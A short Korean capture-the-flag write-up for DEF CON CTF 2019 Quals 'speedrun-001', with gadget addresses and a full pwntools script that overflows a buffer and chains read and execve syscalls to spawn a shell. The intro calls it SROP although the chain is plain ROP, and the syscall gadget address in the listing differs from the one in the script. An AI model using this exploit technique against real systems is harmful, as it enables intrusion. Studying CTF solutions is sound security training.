Defcon Ctf 2019 Qualifier Speedrun001

LeeDoHyun · December 1, 2019

간단한 SROP 문제입니다. ROPgadget으로 pop(rax, rdi, rsi, rdx) 가젯을 구해주고, rp++로 syscall을 찾아 익스하면 됩니다.

syscall = 0x00474e65 #: syscall  ; ret  ;  (1 found)

pop_rdi = 0x0000000000400686 #: pop rdi ; ret
pop_rsi = 0x00000000004101f3 #: pop rsi ; ret
pop_rdx = 0x00000000004498b5 #: pop rdx ; ret
pop_rax = 0x0000000000415664 #: pop rax ; ret

exploit.py

from pwn import *

# Exploit script for the DEF CON CTF 2019 Quals "speedrun-001" challenge.
# Two ROP chains are stacked in one payload: the first stages "/bin/sh" into
# .bss with the read syscall, the second calls execve on that buffer.
# NOTE(review): str + p64() concatenation below is Python 2 pwntools style;
# under Python 3 the filler would have to be bytes.

#context.log_level = "debug"
#r = remote("speedrun-001.quals2019.oooverflow.io", 31337)
r = process("./speedrun-001")
e = ELF("./speedrun-001")

# Gadget addresses taken from the listing above; they are fixed for this
# binary. NOTE(review): a position-independent build (PIE) or a stack canary
# would invalidate this chain — confirm the binary's protections with checksec.
syscall = 0x00000000004755f5
pop_rdi = 0x0000000000400686
pop_rsi = 0x00000000004101f3
pop_rdx = 0x00000000004498b5
pop_rax = 0x0000000000415664
binsh = "/bin/sh\00"  # 8 bytes including the NUL terminator; matches the read() length below

# 0x400 bytes of filler plus 8 more (presumably the saved frame pointer)
# before the saved return address is overwritten — offsets are challenge-specific.
payload = "A"*0x400 + "B"*0x8
# Stage 1: read(0, e.bss(), 8) — x86-64 syscall 0 — pulls binsh from stdin into .bss.
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi) + p64(e.bss())
payload += p64(pop_rdx) + p64(8)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall)

# Stage 2: execve(e.bss(), NULL, NULL) — x86-64 syscall 59 — runs the staged path.
payload += p64(pop_rdi) + p64(e.bss())
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(pop_rax) + p64(59)
payload += p64(syscall)

r.sendline(payload)
# Consumed by the stage-1 read(); exactly 8 bytes, so the trailing newline is left unread.
r.sendline(binsh)
r.interactive()
